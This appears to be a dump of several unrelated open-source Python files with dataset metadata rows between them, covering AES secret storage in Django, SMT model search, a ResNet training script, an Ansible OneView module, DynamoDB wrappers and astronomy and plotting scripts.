raise Exception("Must unlock or set plaintext before locking.")
# Pad and encrypt plaintext
iv = os.urandom(16)
aes = AES.new(secret_key, AES.MODE_CFB, iv)
self.ciphertext = iv + aes.encrypt(self._pad(self.plaintext))
# Generate SHA256 using Django's built-in password hashing mechanism
self.hash = make_password(self.plaintext, hasher=SecretValidationHasher())
self.plaintext = None
def decrypt(self, secret_key):
"""
Consume the first 16 bytes of self.ciphertext as the AES initialization vector (IV). The remainder is decrypted
using the IV and the provided secret key. Padding is then removed to reveal the plaintext. Finally, validate the
decrypted plaintext value against the stored hash.
"""
if self.plaintext is not None:
return
if not self.ciphertext:
raise Exception("Must define ciphertext before unlocking.")
# Decrypt ciphertext and remove padding
iv = bytes(self.ciphertext[0:16])
ciphertext = bytes(self.ciphertext[16:])
aes = AES.new(secret_key, AES.MODE_CFB, iv)
plaintext = self._unpad(aes.decrypt(ciphertext))
# Verify decrypted plaintext against hash
if not self.validate(plaintext):
raise ValueError("Invalid key or ciphertext!")
self.plaintext = plaintext
def validate(self, plaintext):
"""
Validate that a given plaintext matches the stored hash.
"""
if not self.hash:
raise Exception("Hash has not been generated for this secret.")
return check_password(plaintext, self.hash, preferred=SecretValidationHasher())
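# Hedged usage sketch (added for illustration; not part of the original module). It
# assumes a configured Django environment with these models migrated, a Secret
# instance, and a master key such as the one produced by utils.generate_random_key().
def _example_secret_round_trip(secret, master_key):
    """Encrypt a plaintext into ``secret`` and read it back with the same master key."""
    secret.plaintext = "swordfish"
    secret.encrypt(master_key)   # fills secret.ciphertext and secret.hash, clears plaintext
    secret.decrypt(master_key)   # recovers the plaintext and validates it against the hash
    return secret.plaintext      # -> "swordfish"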
| apache-2.0 | -4,090,337,497,129,936,000 | 33.68 | 120 | 0.619581 | false |
5nizza/party-elli | synthesis/model_k_searcher.py | 1 | 1140 | import logging
from helpers.logging_helper import log_entrance
from interfaces.LTS import LTS
from interfaces.solver_interface import SolverInterface
from synthesis.coreach_encoder import CoreachEncoder
from synthesis.smt_format import make_check_sat
@log_entrance()
def search(min_size:int, max_size:int,
max_k:int,
encoder:CoreachEncoder,
solver:SolverInterface) -> LTS or None:
solver += encoder.encode_headers()
solver += encoder.encode_initialization()
last_size = 0
for size in range(min_size, max_size+1):
k = min(max_k, size//3 + 1)
logging.info('searching a model: size=%i, k=%i'%(size,k))
solver += encoder.encode_run_graph(range(size)[last_size:])
solver.push() # >>>>>>>>> push
solver += encoder.encode_model_bound(range(size))
solver += make_check_sat(encoder.encode_assumption_forbid_k(max_k - k))
solver += encoder.encode_get_model_values()
ret = solver.solve()
if ret:
return encoder.parse_model(ret)
solver.pop() # <<<<<<<<<< pop
last_size = size
return None
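# Hedged usage sketch (added for illustration; building the CoreachEncoder and the
# solver interface is project-specific and not shown here):
#   lts = search(min_size=1, max_size=20, max_k=4, encoder=encoder, solver=solver)
# The loop above grows the candidate model size and the co-reachability bound
# k = min(max_k, size//3 + 1) until the solver returns a model, otherwise None.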
| mit | 5,410,120,537,181,015,000 | 30.666667 | 79 | 0.635965 | false |
qdonnellan/django_emailoto | emailoto/config.py | 1 | 1065 | from django.conf import settings
class EmailOtoConfig(object):
def __init__(self):
"""Read from settings.py and apply defaults (or raise exceptions.)"""
self.redis_host = settings.EMAILOTO.get('redis_host', 'localhost')
self.redis_port = settings.EMAILOTO.get('redis_port', 6379)
self.redis_db = settings.EMAILOTO.get('redis_db', 2)
self.expiration = settings.EMAILOTO.get('expiration', 60 * 10)
self.ratelimit = settings.EMAILOTO.get('ratelimit', '5/m')
class ImproperlyConfigured(Exception):
pass
@property
def mailgun_api_key(self):
return self.get_or_raise('mailgun_api_key')
@property
def mailgun_api_url(self):
return self.get_or_raise('mailgun_api_url')
def get_or_raise(self, setting_key):
value = settings.EMAILOTO.get(setting_key)
if not value:
raise self.ImproperlyConfigured(
'No "%s" found in settings.py configuration.' % (setting_key)
)
return value
CONFIG = EmailOtoConfig()
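# Example settings (added for illustration; values are placeholders, not real
# credentials). This is the EMAILOTO dict shape the class above reads from settings.py:
# EMAILOTO = {
#     'redis_host': 'localhost',
#     'redis_port': 6379,
#     'redis_db': 2,
#     'expiration': 60 * 10,
#     'ratelimit': '5/m',
#     'mailgun_api_key': '<mailgun-api-key>',
#     'mailgun_api_url': '<mailgun-messages-endpoint>',
# }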
| mit | -8,496,874,060,864,339,000 | 29.428571 | 77 | 0.630986 | false |
EPyutao/tfProject | Resnet.py | 1 | 1879 | from __future__ import division, print_function, absolute_import
import tflearn
# Residual blocks
# 32 layers: n=5, 56 layers: n=9, 110 layers: n=18
n = 5
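# Total depth is 6n + 2: three stacks of n residual blocks (two conv layers each) plus
# the initial conv and the final fully connected layer, so n=5 gives 32 layers.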
# Data loading
from tflearn.datasets import cifar10
(X, Y), (testX, testY) = cifar10.load_data()
Y = tflearn.data_utils.to_categorical(Y, 10)
testY = tflearn.data_utils.to_categorical(testY, 10)
# Real-time data preprocessing
img_prep = tflearn.ImagePreprocessing()
img_prep.add_featurewise_zero_center(per_channel=True)
# Real-time data augmentation
img_aug = tflearn.ImageAugmentation()
img_aug.add_random_flip_leftright()
img_aug.add_random_crop([32, 32], padding=4)
# Building Residual Network
net = tflearn.input_data(shape=[None, 32, 32, 3],
data_preprocessing=img_prep,
data_augmentation=img_aug)
net = tflearn.conv_2d(net, 16, 3, regularizer='L2', weight_decay=0.0001)
net = tflearn.residual_block(net, n, 16)
net = tflearn.residual_block(net, 1, 32, downsample=True)
net = tflearn.residual_block(net, n-1, 32)
net = tflearn.residual_block(net, 1, 64, downsample=True)
net = tflearn.residual_block(net, n-1, 64)
net = tflearn.batch_normalization(net)
net = tflearn.activation(net, 'relu')
net = tflearn.global_avg_pool(net)
# Regression
net = tflearn.fully_connected(net, 10, activation='softmax')
mom = tflearn.Momentum(0.1, lr_decay=0.1, decay_step=32000, staircase=True)
net = tflearn.regression(net, optimizer=mom,
loss='categorical_crossentropy')
# Training
model = tflearn.DNN(net, checkpoint_path='model_resnet_cifar10',
max_checkpoints=10, tensorboard_verbose=0,
clip_gradients=0.)
model.fit(X, Y, n_epoch=200, validation_set=(testX, testY),
snapshot_epoch=False, snapshot_step=500,
show_metric=True, batch_size=128, shuffle=True,
run_id='resnet_cifar10')
| mit | -5,045,116,224,309,985,000 | 36.58 | 75 | 0.688664 | false |
HewlettPackard/oneview-ansible | library/oneview_enclosure_group_facts.py | 1 | 4175 | #!/usr/bin/python
# -*- coding: utf-8 -*-
###
# Copyright (2016-2019) Hewlett Packard Enterprise Development LP
#
# Licensed under the Apache License, Version 2.0 (the "License");
# You may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
###
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['stableinterface'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: oneview_enclosure_group_facts
short_description: Retrieve facts about one or more of the OneView Enclosure Groups.
description:
- Retrieve facts about one or more of the Enclosure Groups from OneView.
version_added: "2.3"
requirements:
- "python >= 2.7.9"
- "hpeOneView >= 5.4.0"
author:
- "Gustavo Hennig (@GustavoHennig)"
- "Bruno Souza (@bsouza)"
options:
name:
description:
- Enclosure Group name.
required: false
options:
description:
- "List with options to gather additional facts about Enclosure Group.
Options allowed:
C(configuration_script) Gets the configuration script for an Enclosure Group."
required: false
extends_documentation_fragment:
- oneview
- oneview.factsparams
'''
EXAMPLES = '''
- name: Gather facts about all Enclosure Groups
oneview_enclosure_group_facts:
hostname: 172.16.101.48
username: administrator
password: my_password
api_version: 1600
delegate_to: localhost
- debug: var=enclosure_groups
- name: Gather paginated, filtered and sorted facts about Enclosure Groups
oneview_enclosure_group_facts:
hostname: 172.16.101.48
username: administrator
password: my_password
api_version: 1600
params:
start: 0
count: 3
sort: 'name:descending'
filter: 'status=OK'
scope_uris: '/rest/scopes/cd237b60-09e2-45c4-829e-082e318a6d2a'
- debug: var=enclosure_groups
- name: Gather facts about an Enclosure Group by name with configuration script
oneview_enclosure_group_facts:
hostname: 172.16.101.48
username: administrator
password: my_password
api_version: 1600
name: "Test Enclosure Group Facts"
options:
- configuration_script
delegate_to: localhost
- debug: var=enclosure_groups
- debug: var=enclosure_group_script
'''
RETURN = '''
enclosure_groups:
description: Has all the OneView facts about the Enclosure Groups.
returned: Always, but can be null.
type: dict
enclosure_group_script:
description: The configuration script for an Enclosure Group.
returned: When requested, but can be null.
type: string
'''
from ansible.module_utils.oneview import OneViewModule
class EnclosureGroupFactsModule(OneViewModule):
argument_spec = dict(
name=dict(required=False, type='str'),
options=dict(required=False, type='list'),
params=dict(required=False, type='dict')
)
def __init__(self):
super(EnclosureGroupFactsModule, self).__init__(additional_arg_spec=self.argument_spec)
self.set_resource_object(self.oneview_client.enclosure_groups)
def execute_module(self):
facts = {}
enclosure_groups = []
name = self.module.params.get("name")
if name:
if self.current_resource:
enclosure_groups = self.current_resource.data
if "configuration_script" in self.options:
facts["enclosure_group_script"] = self.current_resource.get_script()
else:
enclosure_groups = self.resource_client.get_all(**self.facts_params)
facts["enclosure_groups"] = enclosure_groups
return dict(changed=False, ansible_facts=facts)
def main():
EnclosureGroupFactsModule().run()
if __name__ == '__main__':
main()
| apache-2.0 | 5,266,151,565,631,276,000 | 28.401408 | 95 | 0.677365 | false |
ragupta-git/ImcSdk | imcsdk/mometa/equipment/EquipmentSystemIOController.py | 1 | 2755 | """This module contains the general information for EquipmentSystemIOController ManagedObject."""
from ...imcmo import ManagedObject
from ...imccoremeta import MoPropertyMeta, MoMeta
from ...imcmeta import VersionMeta
class EquipmentSystemIOControllerConsts:
ADMIN_POWER_CMC_REBOOT = "cmc-reboot"
ADMIN_POWER_CMC_RESET_DEFAULT = "cmc-reset-default"
ADMIN_POWER_POLICY = "policy"
class EquipmentSystemIOController(ManagedObject):
"""This is EquipmentSystemIOController class."""
consts = EquipmentSystemIOControllerConsts()
naming_props = set([u'id'])
mo_meta = {
"modular": MoMeta("EquipmentSystemIOController", "equipmentSystemIOController", "slot-[id]", VersionMeta.Version2013e, "InputOutput", 0x1f, [], ["admin", "read-only", "user"], [u'equipmentChassis'], [u'commEpIpmiLan', u'equipmentSharedIOModule', u'mgmtController', u'siocResetReason'], ["Get", "Set"])
}
prop_meta = {
"modular": {
"admin_power": MoPropertyMeta("admin_power", "adminPower", "string", VersionMeta.Version2013e, MoPropertyMeta.READ_WRITE, 0x2, None, None, None, ["cmc-reboot", "cmc-reset-default", "policy"], []),
"child_action": MoPropertyMeta("child_action", "childAction", "string", VersionMeta.Version2013e, MoPropertyMeta.INTERNAL, None, None, None, None, [], []),
"description": MoPropertyMeta("description", "description", "string", VersionMeta.Version2013e, MoPropertyMeta.READ_ONLY, None, 0, 510, None, [], []),
"dn": MoPropertyMeta("dn", "dn", "string", VersionMeta.Version2013e, MoPropertyMeta.READ_WRITE, 0x4, 0, 255, None, [], []),
"id": MoPropertyMeta("id", "id", "uint", VersionMeta.Version2013e, MoPropertyMeta.NAMING, None, None, None, None, [], ["1-2"]),
"rn": MoPropertyMeta("rn", "rn", "string", VersionMeta.Version2013e, MoPropertyMeta.READ_WRITE, 0x8, 0, 255, None, [], []),
"status": MoPropertyMeta("status", "status", "string", VersionMeta.Version2013e, MoPropertyMeta.READ_WRITE, 0x10, None, None, None, ["", "created", "deleted", "modified", "removed"], []),
},
}
prop_map = {
"modular": {
"adminPower": "admin_power",
"childAction": "child_action",
"description": "description",
"dn": "dn",
"id": "id",
"rn": "rn",
"status": "status",
},
}
def __init__(self, parent_mo_or_dn, id, **kwargs):
self._dirty_mask = 0
self.id = id
self.admin_power = None
self.child_action = None
self.description = None
self.status = None
ManagedObject.__init__(self, "EquipmentSystemIOController", parent_mo_or_dn, **kwargs)
| apache-2.0 | -862,146,203,412,341,400 | 43.435484 | 309 | 0.625408 | false |
aerosara/thesis | notebooks_archive_10112014/pycse Examples.py | 1 | 2176 | # -*- coding: utf-8 -*-
# <nbformat>3.0</nbformat>
# <headingcell level=3>
# Example from pycse 1
# <codecell>
# copied from http://kitchingroup.cheme.cmu.edu/blog/tag/events/
from pycse import odelay
import matplotlib.pyplot as plt
import numpy as np
def ode(Y,x):
y1, y2 = Y
dy1dx = y2
dy2dx = -y1
return [dy1dx, dy2dx]
def event1(Y, x):
y1, y2 = Y
value = y2 - (-1.0)
isterminal = True
direction = 0
return value, isterminal, direction
def event2(Y, x):
dy1dx, dy2dx = ode(Y,x)
value = dy1dx - 0.0
isterminal = False
direction = -1 # derivative is decreasing towards a maximum
return value, isterminal, direction
Y0 = [2.0, 1.0]
xspan = np.linspace(0, 5)
X, Y, XE, YE, IE = odelay(ode, Y0, xspan, events=[event1, event2])
plt.plot(X, Y)
for ie,xe,ye in zip(IE, XE, YE):
if ie == 1: #this is the second event
y1,y2 = ye
plt.plot(xe, y1, 'ro')
plt.legend(['$y_1$', '$y_2$'], loc='best')
#plt.savefig('images/odelay-mult-eq.png')
plt.show()
# <headingcell level=3>
# Example from pycse 2
# <codecell>
# copied from: http://kitchingroup.cheme.cmu.edu/pycse/pycse.html#sec-10-1-8
# 10.1.8 Stopping the integration of an ODE at some condition
from pycse import *
import numpy as np
k = 0.23
Ca0 = 2.3
def dCadt(Ca, t):
return -k * Ca**2
def stop(Ca, t):
isterminal = True
direction = 0
value = 1.0 - Ca
return value, isterminal, direction
tspan = np.linspace(0.0, 10.0)
t, CA, TE, YE, IE = odelay(dCadt, Ca0, tspan, events=[stop])
print 'At t = {0:1.2f} seconds the concentration of A is {1:1.2f} mol/L.'.format(t[-1], float(CA[-1]))
# <headingcell level=3>
# fsolve example
# <codecell>
from math import cos
def func(x):
return x + 2*cos(x) # finds where this is zero
def func2(x):
out = [x[0]*cos(x[1]) - 4]
out.append(x[1]*x[0] - x[1] - 5)
return out # finds where both elements of this array are zero
from scipy.optimize import fsolve
x0 = fsolve(func, 0.3) # initial guess
print x0
print func(x0)
#-1.02986652932
x02 = fsolve(func2, [1, 1]) # initial guesses
print x02
print func2(x02)
#[ 6.50409711 0.90841421]
| mit | 5,269,726,309,331,049,000 | 18.781818 | 102 | 0.628676 | false |
mtsgrd/PynamoDB2 | pynamodb/connection/table.py | 1 | 7391 | """
PynamoDB Connection classes
~~~~~~~~~~~~~~~~~~~~~~~~~~~
"""
from .base import Connection
class TableConnection(object):
"""
A higher level abstraction over botocore
"""
def __init__(self, table_name, region=None, host=None):
self._hash_keyname = None
self._range_keyname = None
self.table_name = table_name
self.connection = Connection(region=region, host=host)
def delete_item(self, hash_key,
range_key=None,
expected=None,
return_values=None,
return_consumed_capacity=None,
return_item_collection_metrics=None):
"""
Performs the DeleteItem operation and returns the result
"""
return self.connection.delete_item(
self.table_name,
hash_key,
range_key=range_key,
expected=expected,
return_values=return_values,
return_consumed_capacity=return_consumed_capacity,
return_item_collection_metrics=return_item_collection_metrics)
def update_item(self,
hash_key,
range_key=None,
attribute_updates=None,
expected=None,
return_consumed_capacity=None,
return_item_collection_metrics=None,
return_values=None
):
"""
Performs the UpdateItem operation
"""
return self.connection.update_item(
self.table_name,
hash_key,
range_key=range_key,
attribute_updates=attribute_updates,
expected=expected,
return_consumed_capacity=return_consumed_capacity,
return_item_collection_metrics=return_item_collection_metrics,
return_values=return_values)
def put_item(self, hash_key,
range_key=None,
attributes=None,
expected=None,
return_values=None,
return_consumed_capacity=None,
return_item_collection_metrics=None):
"""
Performs the PutItem operation and returns the result
"""
return self.connection.put_item(
self.table_name,
hash_key,
range_key=range_key,
attributes=attributes,
expected=expected,
return_values=return_values,
return_consumed_capacity=return_consumed_capacity,
return_item_collection_metrics=return_item_collection_metrics)
def batch_write_item(self,
put_items=None,
delete_items=None,
return_consumed_capacity=None,
return_item_collection_metrics=None):
"""
Performs the batch_write_item operation
"""
return self.connection.batch_write_item(
self.table_name,
put_items=put_items,
delete_items=delete_items,
return_consumed_capacity=return_consumed_capacity,
return_item_collection_metrics=return_item_collection_metrics)
def batch_get_item(self, keys, consistent_read=None, return_consumed_capacity=None, attributes_to_get=None):
"""
Performs the batch get item operation
"""
return self.connection.batch_get_item(
self.table_name,
keys,
consistent_read=consistent_read,
return_consumed_capacity=return_consumed_capacity,
attributes_to_get=attributes_to_get)
def get_item(self, hash_key, range_key=None, consistent_read=False, attributes_to_get=None):
"""
Performs the GetItem operation and returns the result
"""
return self.connection.get_item(
self.table_name,
hash_key,
range_key=range_key,
consistent_read=consistent_read,
attributes_to_get=attributes_to_get)
def scan(self,
attributes_to_get=None,
limit=None,
scan_filter=None,
return_consumed_capacity=None,
segment=None,
total_segments=None,
exclusive_start_key=None):
"""
Performs the scan operation
"""
return self.connection.scan(
self.table_name,
attributes_to_get=attributes_to_get,
limit=limit,
scan_filter=scan_filter,
return_consumed_capacity=return_consumed_capacity,
segment=segment,
total_segments=total_segments,
exclusive_start_key=exclusive_start_key)
def query(self,
hash_key,
attributes_to_get=None,
consistent_read=False,
exclusive_start_key=None,
index_name=None,
key_conditions=None,
limit=None,
return_consumed_capacity=None,
scan_index_forward=None,
select=None
):
"""
Performs the Query operation and returns the result
"""
return self.connection.query(
self.table_name,
hash_key,
attributes_to_get=attributes_to_get,
consistent_read=consistent_read,
exclusive_start_key=exclusive_start_key,
index_name=index_name,
key_conditions=key_conditions,
limit=limit,
return_consumed_capacity=return_consumed_capacity,
scan_index_forward=scan_index_forward,
select=select)
def describe_table(self):
"""
Performs the DescribeTable operation and returns the result
"""
return self.connection.describe_table(self.table_name)
def delete_table(self):
"""
Performs the DeleteTable operation and returns the result
"""
return self.connection.delete_table(self.table_name)
def update_table(self,
read_capacity_units=None,
write_capacity_units=None,
global_secondary_index_updates=None):
"""
Performs the UpdateTable operation and returns the result
"""
return self.connection.update_table(
self.table_name,
read_capacity_units=read_capacity_units,
write_capacity_units=write_capacity_units,
global_secondary_index_updates=global_secondary_index_updates)
def create_table(self,
attribute_definitions=None,
key_schema=None,
read_capacity_units=None,
write_capacity_units=None,
global_secondary_indexes=None,
local_secondary_indexes=None):
"""
Performs the CreateTable operation and returns the result
"""
return self.connection.create_table(
self.table_name,
attribute_definitions=attribute_definitions,
key_schema=key_schema,
read_capacity_units=read_capacity_units,
write_capacity_units=write_capacity_units,
global_secondary_indexes=global_secondary_indexes,
local_secondary_indexes=local_secondary_indexes
)
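# Hedged usage sketch (added for illustration): the table and attribute names are made
# up, and item attributes are assumed to use DynamoDB's low-level {"type": "value"} encoding.
def _example_thread_table():
    conn = TableConnection('Thread', region='us-east-1')
    conn.put_item('forum-name', range_key='subject', attributes={'views': {'N': '0'}})
    return conn.get_item('forum-name', range_key='subject')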
| mit | 4,248,419,250,073,645,600 | 34.533654 | 112 | 0.557705 | false |
BeegorMif/HTPC-Manager | autoProcessTV/mediaToSickbeard.py | 1 | 6654 | #!/usr/bin/env python2
import sys
import os
import time
import ConfigParser
import logging
sickbeardPath = os.path.split(os.path.split(sys.argv[0])[0])[0]
sys.path.append(os.path.join( sickbeardPath, 'lib'))
sys.path.append(sickbeardPath)
configFilename = os.path.join(sickbeardPath, "config.ini")
import requests
config = ConfigParser.ConfigParser()
try:
fp = open(configFilename, "r")
config.readfp(fp)
fp.close()
except IOError, e:
print "Could not find/read Sickbeard config.ini: " + str(e)
print 'Possibly wrong mediaToSickbeard.py location. Ensure the file is in the autoProcessTV subdir of your Sickbeard installation'
time.sleep(3)
sys.exit(1)
scriptlogger = logging.getLogger('mediaToSickbeard')
formatter = logging.Formatter('%(asctime)s %(levelname)-8s MEDIATOSICKBEARD :: %(message)s', '%b-%d %H:%M:%S')
# Get the log dir setting from SB config
logdirsetting = config.get("General", "log_dir") if config.get("General", "log_dir") else 'Logs'
# put the log dir inside the SickBeard dir, unless an absolute path
logdir = os.path.normpath(os.path.join(sickbeardPath, logdirsetting))
logfile = os.path.join(logdir, 'sickbeard.log')
try:
handler = logging.FileHandler(logfile)
except:
print 'Unable to open/create the log file at ' + logfile
time.sleep(3)
sys.exit()
handler.setFormatter(formatter)
scriptlogger.addHandler(handler)
scriptlogger.setLevel(logging.DEBUG)
def utorrent():
# print 'Calling utorrent'
if len(sys.argv) < 2:
scriptlogger.error('No folder supplied - is this being called from uTorrent?')
print "No folder supplied - is this being called from uTorrent?"
time.sleep(3)
sys.exit()
dirName = sys.argv[1]
nzbName = sys.argv[2]
return (dirName, nzbName)
def transmission():
dirName = os.getenv('TR_TORRENT_DIR')
nzbName = os.getenv('TR_TORRENT_NAME')
return (dirName, nzbName)
def deluge():
if len(sys.argv) < 4:
scriptlogger.error('No folder supplied - is this being called from Deluge?')
print "No folder supplied - is this being called from Deluge?"
time.sleep(3)
sys.exit()
dirName = sys.argv[3]
nzbName = sys.argv[2]
return (dirName, nzbName)
def blackhole():
if None != os.getenv('TR_TORRENT_DIR'):
scriptlogger.debug('Processing script triggered by Transmission')
print "Processing script triggered by Transmission"
scriptlogger.debug(u'TR_TORRENT_DIR: ' + os.getenv('TR_TORRENT_DIR'))
scriptlogger.debug(u'TR_TORRENT_NAME: ' + os.getenv('TR_TORRENT_NAME'))
dirName = os.getenv('TR_TORRENT_DIR')
nzbName = os.getenv('TR_TORRENT_NAME')
else:
if len(sys.argv) < 2:
            scriptlogger.error('No folder supplied - Your client should invoke the script with a Dir and a Release Name')
            print "No folder supplied - Your client should invoke the script with a Dir and a Release Name"
time.sleep(3)
sys.exit()
dirName = sys.argv[1]
nzbName = sys.argv[2]
return (dirName, nzbName)
#def hella():
# if len(sys.argv) < 4:
# scriptlogger.error('No folder supplied - is this being called from HellaVCR?')
# print "No folder supplied - is this being called from HellaVCR?"
# sys.exit()
# else:
# dirName = sys.argv[3]
# nzbName = sys.argv[2]
#
# return (dirName, nzbName)
def main():
scriptlogger.info(u'Starting external PostProcess script ' + __file__)
host = config.get("General", "web_host")
port = config.get("General", "web_port")
username = config.get("General", "web_username")
password = config.get("General", "web_password")
try:
ssl = int(config.get("General", "enable_https"))
except (ConfigParser.NoOptionError, ValueError):
ssl = 0
try:
web_root = config.get("General", "web_root")
except ConfigParser.NoOptionError:
web_root = ""
tv_dir = config.get("General", "tv_download_dir")
use_torrents = int(config.get("General", "use_torrents"))
torrent_method = config.get("General", "torrent_method")
if not use_torrents:
scriptlogger.error(u'Enable Use Torrent on Sickbeard to use this Script. Aborting!')
print u'Enable Use Torrent on Sickbeard to use this Script. Aborting!'
time.sleep(3)
sys.exit()
if not torrent_method in ['utorrent', 'transmission', 'deluge', 'blackhole']:
scriptlogger.error(u'Unknown Torrent Method. Aborting!')
print u'Unknown Torrent Method. Aborting!'
time.sleep(3)
sys.exit()
dirName, nzbName = eval(locals()['torrent_method'])()
if dirName is None:
        scriptlogger.error(u'MediaToSickbeard script needs a dir to be run. Aborting!')
        print u'MediaToSickbeard script needs a dir to be run. Aborting!'
time.sleep(3)
sys.exit()
if not os.path.isdir(dirName):
scriptlogger.error(u'Folder ' + dirName + ' does not exist. Aborting AutoPostProcess.')
print u'Folder ' + dirName + ' does not exist. Aborting AutoPostProcess.'
time.sleep(3)
sys.exit()
if nzbName and os.path.isdir(os.path.join(dirName, nzbName)):
dirName = os.path.join(dirName, nzbName)
params = {}
params['quiet'] = 1
params['dir'] = dirName
if nzbName != None:
params['nzbName'] = nzbName
if ssl:
protocol = "https://"
else:
protocol = "http://"
if host == '0.0.0.0':
host = 'localhost'
url = protocol + host + ":" + port + web_root + "/home/postprocess/processEpisode"
scriptlogger.debug("Opening URL: " + url + ' with params=' + str(params))
print "Opening URL: " + url + ' with params=' + str(params)
try:
response = requests.get(url, auth=(username, password), params=params, verify=False)
except Exception, e:
scriptlogger.error(u': Unknown exception raised when opening url: ' + str(e))
time.sleep(3)
sys.exit()
if response.status_code == 401:
scriptlogger.error(u'Invalid Sickbeard Username or Password, check your config')
print 'Invalid Sickbeard Username or Password, check your config'
time.sleep(3)
sys.exit()
if response.status_code == 200:
        scriptlogger.info(u'Script ' + __file__ + ' Successful')
        print 'Script ' + __file__ + ' Successful'
time.sleep(3)
sys.exit()
if __name__ == '__main__':
main()
| gpl-3.0 | 1,972,086,942,503,040,300 | 31.617647 | 134 | 0.628194 | false |
victorpoughon/master-thesis | python/outlier_analysis.py | 1 | 1365 | #!/usr/bin/env python3
import os
import os.path
import sys
import numpy as np
import matplotlib.pyplot as plt
from features_common import match_angle, base_plot
def outlier_frequency_plot(path, angles, threshold):
f, ax = base_plot()
ax.plot(100 * np.cumsum(np.abs(angles) > threshold) / angles.size)
ax.set_xlabel("Match number")
ax.set_ylabel("Outlier fraction (%)")
ax.set_ylim([0, 100])
f.savefig(path, bbox_inches='tight')
plt.close(f)
if __name__ == "__main__":
if len(sys.argv) < 2:
path = "."
else:
path = sys.argv[1]
    # Produce outlier plots for every directory that contains matches.txt (plus its shape.txt and outlier_threshold.txt)
for root, subdirs, files in os.walk(path):
if "matches.txt" in files:
shape = np.loadtxt(os.path.join(root, "shape.txt"))
matches = np.loadtxt(os.path.join(root, "matches.txt"), comments="#")
threshold = np.loadtxt(os.path.join(root, "outlier_threshold.txt"))
if threshold.size == 1:
print("outlier_analysis.py: " + root)
# Compute matches angles
angles = match_angle(matches, shape)
outlier_frequency_plot(os.path.join(root, "plot_outliers.pdf"), angles, threshold)
else:
print("outlier_analysis.py: " + root + " --- empty outlier_threshold.txt")
| mit | 2,286,111,514,915,068,000 | 34 | 98 | 0.605861 | false |
dcf21/4most-4gp-scripts | src/scripts/synthesize_samples/synthesize_galah_with_microturbulence.py | 1 | 4084 | #!../../../../virtualenv/bin/python3
# -*- coding: utf-8 -*-
# NB: The shebang line above assumes you've installed a python virtual environment alongside your working copy of the
# <4most-4gp-scripts> git repository. It also only works if you invoke this python script from the directory where it
# is located. If these two assumptions are incorrect (e.g. you're using Conda), you can still use this script by typing
# <python synthesize_galah.py>, but <./synthesize_galah.py> will not work.
"""
Take parameters of GALAH sample of stars emailed by Karin on 30 Oct 2017, and synthesize spectra using
TurboSpectrum.
"""
import logging
import numpy as np
from astropy.io import fits
from lib.base_synthesizer import Synthesizer
# List of elements whose abundances we pass to TurboSpectrum
element_list = (
'Al', 'Ba', 'C', 'Ca', 'Ce', 'Co', 'Cr', 'Cu', 'Eu', 'K', 'La', 'Li', 'Mg', 'Mn', 'Mo', 'Na', 'Nd', 'Ni', 'O',
'Rb', 'Ru', 'Sc', 'Si', 'Sm', 'Sr', 'Ti', 'V', 'Y', 'Zn', 'Zr'
)
# Start logging our progress
logging.basicConfig(level=logging.INFO, format='[%(asctime)s] %(levelname)s:%(filename)s:%(message)s',
datefmt='%d/%m/%Y %H:%M:%S')
logger = logging.getLogger(__name__)
logger.info("Synthesizing GALAH sample spectra, with microturbulence")
# Instantiate base synthesizer
synthesizer = Synthesizer(library_name="galah_sample_v2",
logger=logger,
docstring=__doc__)
# Table supplies list of abundances for GES stars
f = fits.open("../../../../downloads/GALAH_trainingset_4MOST_errors.fits")
galah_stars = f[1].data
galah_fields = galah_stars.names
# Loop over stars extracting stellar parameters from FITS file
star_list = []
for star_index in range(len(galah_stars)):
fe_abundance = float(galah_stars.Feh_sme[star_index])
star_list_item = {
"name": "star_{:08d}".format(star_index),
"Teff": float(galah_stars.Teff_sme[star_index]),
"[Fe/H]": fe_abundance,
"logg": float(galah_stars.Logg_sme[star_index]),
"extra_metadata": {},
"free_abundances": {},
"input_data": {}
}
# Work out micro-turbulent velocity
if (star_list_item['logg'] >= 4.2) and (star_list_item['Teff'] <= 5500):
star_list_item['microturbulence'] = \
1.1 + 1e-4 * (star_list_item['Teff'] - 5500) + 4e-7 * (star_list_item['Teff'] - 5500) ** 2
else:
star_list_item['microturbulence'] = \
1.1 + 1.6e-4 * (star_list_item['Teff'] - 5500)
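    # Worked example (added for clarity): a dwarf with Teff=5000 and logg=4.4 takes the
    # first branch above: 1.1 + 1e-4*(-500) + 4e-7*(-500)**2 = 1.15.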
# Pass list of the abundances of individual elements to TurboSpectrum
free_abundances = star_list_item["free_abundances"]
metadata = star_list_item["extra_metadata"]
for element in element_list:
if (not synthesizer.args.elements) or (element in synthesizer.args.elements.split(",")):
fits_field_name = "{}_abund_sme".format(element)
# Abundance is specified as [X/Fe]. Convert to [X/H]
abundance = galah_stars[fits_field_name][star_index] + fe_abundance
if np.isfinite(abundance):
free_abundances[element] = float(abundance)
metadata["flag_{}".format(element)] = float(
galah_stars["flag_{}_abund_sme".format(element)][star_index])
# Propagate all input fields from the FITS file into <input_data>
input_data = star_list_item["input_data"]
for col_name in galah_fields:
value = galah_stars[col_name][star_index]
if galah_stars.dtype[col_name].type is np.string_:
typed_value = str(value)
else:
typed_value = float(value)
input_data[col_name] = typed_value
star_list.append(star_list_item)
# Pass list of stars to synthesizer
synthesizer.set_star_list(star_list)
# Output data into sqlite3 db
synthesizer.dump_stellar_parameters_to_sqlite()
# Create new SpectrumLibrary
synthesizer.create_spectrum_library()
# Iterate over the spectra we're supposed to be synthesizing
synthesizer.do_synthesis()
# Close TurboSpectrum synthesizer instance
synthesizer.clean_up()
| mit | 1,813,588,961,459,979,500 | 37.168224 | 119 | 0.643732 | false |
SamHames/scikit-image | skimage/viewer/canvastools/base.py | 1 | 5472 | import numpy as np
try:
from matplotlib import lines
except ImportError:
pass
__all__ = ['CanvasToolBase', 'ToolHandles']
def _pass(*args):
pass
class CanvasToolBase(object):
"""Base canvas tool for matplotlib axes.
Parameters
----------
ax : :class:`matplotlib.axes.Axes`
Matplotlib axes where tool is displayed.
on_move : function
Function called whenever a control handle is moved.
This function must accept the end points of line as the only argument.
on_release : function
Function called whenever the control handle is released.
on_enter : function
Function called whenever the "enter" key is pressed.
useblit : bool
